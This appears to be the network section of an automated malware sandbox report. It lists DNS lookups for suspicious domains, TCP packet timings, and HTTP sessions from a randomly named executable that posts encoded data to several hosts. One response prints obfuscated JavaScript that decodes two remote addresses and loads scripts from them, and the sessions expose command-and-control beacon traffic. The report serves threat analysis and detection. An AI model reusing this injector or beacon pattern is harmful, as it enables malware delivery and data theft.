                                                                                                                                          Dec 9, 2024 08:50:02.350284100 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.350326061 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.358541965 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.358601093 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.358653069 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.366859913 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.366952896 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.366998911 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.375225067 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.375333071 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.375384092 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.383613110 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.383704901 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.383794069 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.391957998 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.392033100 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.392113924 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.504584074 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.504699945 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.504805088 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.507185936 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.507282019 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.507329941 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.512244940 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.512361050 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.512407064 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.517277956 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.517363071 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.517406940 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.522352934 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.522485018 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.522547007 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.527422905 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.527527094 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.527582884 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.532305956 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.532392979 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.532438993 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.537151098 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.537244081 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.537328959 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.541982889 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.542098045 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.542155981 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.546860933 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.546994925 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.547038078 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.562647104 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.682005882 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:07.967852116 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:08.087207079 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:08.087367058 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:08.102015972 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:08.221506119 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:09.327153921 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:09.327200890 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:09.327325106 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:09.613496065 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.632112026 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.751523972 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:10.751688957 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.765821934 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.885184050 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:11.985996962 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:11.986181021 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:11.986231089 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:12.269762039 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.288933992 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.408291101 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.408433914 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.423752069 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.543184996 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543204069 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543329000 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543339968 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543376923 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543479919 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543489933 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543498039 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543555021 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:14.707390070 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:14.707551956 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:14.707601070 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:14.926124096 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:15.945203066 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:16.064570904 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:16.064697027 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:16.073834896 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:16.193584919 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:17.301317930 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:17.301347017 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:17.301605940 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:17.304318905 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 9, 2024 08:49:02.248861074 CET5935253192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:03.238420010 CET5935253192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:04.254245043 CET5935253192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:04.277450085 CET53593521.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:04.277486086 CET53593521.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:04.391515970 CET53593521.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:20.554636002 CET5767153192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:21.554110050 CET5767153192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:21.596012115 CET53576711.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:21.691171885 CET53576711.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:35.851188898 CET6208053192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:36.291888952 CET53620801.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:51.038526058 CET5615553192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:52.035389900 CET5615553192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:52.775511980 CET53561551.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:52.775554895 CET53561551.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:07.570122004 CET5129653192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:07.965257883 CET53512961.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:22.320162058 CET6069453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:23.316977024 CET6069453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:24.332417965 CET6069453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:24.542695999 CET53606941.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:24.542712927 CET53606941.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:24.542721987 CET53606941.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:39.241904020 CET6323753192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:39.635741949 CET53632371.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:54.804786921 CET5935453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:55.302105904 CET53593541.1.1.1192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 9, 2024 08:49:02.248861074 CET | 192.168.2.4 | 1.1.1.1 | 0x5fd4 | Standard query (0) | www.jgkgf.club | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:03.238420010 CET | 192.168.2.4 | 1.1.1.1 | 0x5fd4 | Standard query (0) | www.jgkgf.club | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:04.254245043 CET | 192.168.2.4 | 1.1.1.1 | 0x5fd4 | Standard query (0) | www.jgkgf.club | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:20.554636002 CET | 192.168.2.4 | 1.1.1.1 | 0x1f7a | Standard query (0) | www.hsa.world | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:21.554110050 CET | 192.168.2.4 | 1.1.1.1 | 0x1f7a | Standard query (0) | www.hsa.world | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:35.851188898 CET | 192.168.2.4 | 1.1.1.1 | 0xc99b | Standard query (0) | www.sssvip2.shop | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:51.038526058 CET | 192.168.2.4 | 1.1.1.1 | 0x98ba | Standard query (0) | www.dutchdubliners.online | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:52.035389900 CET | 192.168.2.4 | 1.1.1.1 | 0x98ba | Standard query (0) | www.dutchdubliners.online | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:07.570122004 CET | 192.168.2.4 | 1.1.1.1 | 0x9162 | Standard query (0) | www.allstary.top | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:22.320162058 CET | 192.168.2.4 | 1.1.1.1 | 0x48b2 | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:23.316977024 CET | 192.168.2.4 | 1.1.1.1 | 0x48b2 | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.332417965 CET | 192.168.2.4 | 1.1.1.1 | 0x48b2 | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:39.241904020 CET | 192.168.2.4 | 1.1.1.1 | 0x6cf9 | Standard query (0) | www.comect.online | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:54.804786921 CET | 192.168.2.4 | 1.1.1.1 | 0x2dde | Standard query (0) | www.emirates-visa.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 9, 2024 08:49:04.277450085 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd4 | No error (0) | www.jgkgf.club | ccchhua889911.222tt.icu | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:49:04.277450085 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd4 | No error (0) | ccchhua889911.222tt.icu | | 172.247.112.164 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:04.277486086 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd4 | No error (0) | www.jgkgf.club | ccchhua889911.222tt.icu | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:49:04.277486086 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd4 | No error (0) | ccchhua889911.222tt.icu | | 172.247.112.164 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:04.391515970 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd4 | No error (0) | www.jgkgf.club | ccchhua889911.222tt.icu | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:49:04.391515970 CET | 1.1.1.1 | 192.168.2.4 | 0x5fd4 | No error (0) | ccchhua889911.222tt.icu | | 172.247.112.164 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:21.596012115 CET | 1.1.1.1 | 192.168.2.4 | 0x1f7a | No error (0) | www.hsa.world | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:21.596012115 CET | 1.1.1.1 | 192.168.2.4 | 0x1f7a | No error (0) | www.hsa.world | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:21.691171885 CET | 1.1.1.1 | 192.168.2.4 | 0x1f7a | No error (0) | www.hsa.world | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:21.691171885 CET | 1.1.1.1 | 192.168.2.4 | 0x1f7a | No error (0) | www.hsa.world | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:36.291888952 CET | 1.1.1.1 | 192.168.2.4 | 0xc99b | No error (0) | www.sssvip2.shop | | 156.253.8.115 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:52.775511980 CET | 1.1.1.1 | 192.168.2.4 | 0x98ba | No error (0) | www.dutchdubliners.online | dutchdubliners.online | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:49:52.775511980 CET | 1.1.1.1 | 192.168.2.4 | 0x98ba | No error (0) | dutchdubliners.online | | 37.97.254.27 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:49:52.775554895 CET | 1.1.1.1 | 192.168.2.4 | 0x98ba | No error (0) | www.dutchdubliners.online | dutchdubliners.online | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:49:52.775554895 CET | 1.1.1.1 | 192.168.2.4 | 0x98ba | No error (0) | dutchdubliners.online | | 37.97.254.27 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:07.965257883 CET | 1.1.1.1 | 192.168.2.4 | 0x9162 | No error (0) | www.allstary.top | | 199.193.6.134 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.542695999 CET | 1.1.1.1 | 192.168.2.4 | 0x48b2 | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.542695999 CET | 1.1.1.1 | 192.168.2.4 | 0x48b2 | No error (0) | hx2.vip.84dns.com | | 149.104.34.134 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.542712927 CET | 1.1.1.1 | 192.168.2.4 | 0x48b2 | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.542712927 CET | 1.1.1.1 | 192.168.2.4 | 0x48b2 | No error (0) | hx2.vip.84dns.com | | 149.104.34.134 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.542721987 CET | 1.1.1.1 | 192.168.2.4 | 0x48b2 | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:50:24.542721987 CET | 1.1.1.1 | 192.168.2.4 | 0x48b2 | No error (0) | hx2.vip.84dns.com | | 149.104.34.134 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:39.635741949 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf9 | No error (0) | www.comect.online | | 124.6.61.130 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:55.302105904 CET | 1.1.1.1 | 192.168.2.4 | 0x2dde | No error (0) | www.emirates-visa.net | emirates-visa.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 08:50:55.302105904 CET | 1.1.1.1 | 192.168.2.4 | 0x2dde | No error (0) | emirates-visa.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 08:50:55.302105904 CET | 1.1.1.1 | 192.168.2.4 | 0x2dde | No error (0) | emirates-visa.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49768 | 172.247.112.164 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 08:49:04.416198969 CET | 491 | OUT | GET /tvkp/?q0C=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.jgkgf.club
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 9, 2024 08:49:05.514425993 CET | 524 | IN | HTTP/1.0 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: max-age=259200
                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                          Content-Length: 395
                                                                                                                                          Data Ascii: <html><head></head><body><script type="text/javascript">function N(c){var a=document.createElement("script");var strU=atob(c)+"/"+btoa("u="+window.location+"&p="+window.location.pathname+window.location.search)+'.js';a.src=strU;document.getElementsByTagName("body")[0].appendChild(a)}N("aHR0cHM6Ly8xOTQuMTQ3Ljk5LjI0NToxMTcxOA==");N("aHR0cHM6Ly8xNTYuMjI3LjEuODQ6NTExOA==");</script></body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49808 | 13.248.169.48 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 08:49:21.744632959 CET | 743 | OUT | POST /09b7/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Origin: http://www.hsa.world
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.hsa.world/09b7/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==
Dec 9, 2024 08:49:22.830460072 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49814 | 13.248.169.48 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 08:49:24.412184954 CET | 763 | OUT | POST /09b7/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Origin: http://www.hsa.world
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.hsa.world/09b7/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Ascii: q0C=9RL4JHol/lViFnAaj0iBMKUWPKJROdVLyC83mzI6FxLYFqV4oM4CKW9jd2fMURHWvDrUXYr8QgelXA0+46htrV5lFg9chqWQLqr0csZFrrKfjqSAK+ZkPIWO4zhMe7S4f7hMEpqIIa6YV3VTBhzxBnvZrdSedA+eQ/Lym7nbmJClaB+N4elhcYkgo2r/le1eN11ufkUz0Bf18IgartvUJ9c=
Dec 9, 2024 08:49:25.493840933 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          3 | 192.168.2.4 | 49824 | 13.248.169.48 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:27.080014944 CET | 10845 | OUT | POST /09b7/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Origin: http://www.hsa.world
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.hsa.world/09b7/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:49:28.164472103 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          4 | 192.168.2.4 | 49830 | 13.248.169.48 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:29.731131077 CET | 490 | OUT | GET /09b7/?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.hsa.world
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:49:30.831568956 CET | 377 | IN | HTTP/1.1 200 OK
                                                                                                                                          content-type: text/html
                                                                                                                                          date: Mon, 09 Dec 2024 07:49:30 GMT
                                                                                                                                          content-length: 256
                                                                                                                                          connection: close
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?q0C=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&0vE=z2LXL2HhYNX8"}</script></head></html>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          5 | 192.168.2.4 | 49846 | 156.253.8.115 | 80 | 4136 | C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          Dec 9, 2024 08:49:36.428558111 CET | 752 | OUT | POST /6t0f/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.sssvip2.shop
                                                                                                                                          Origin: http://www.sssvip2.shop
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
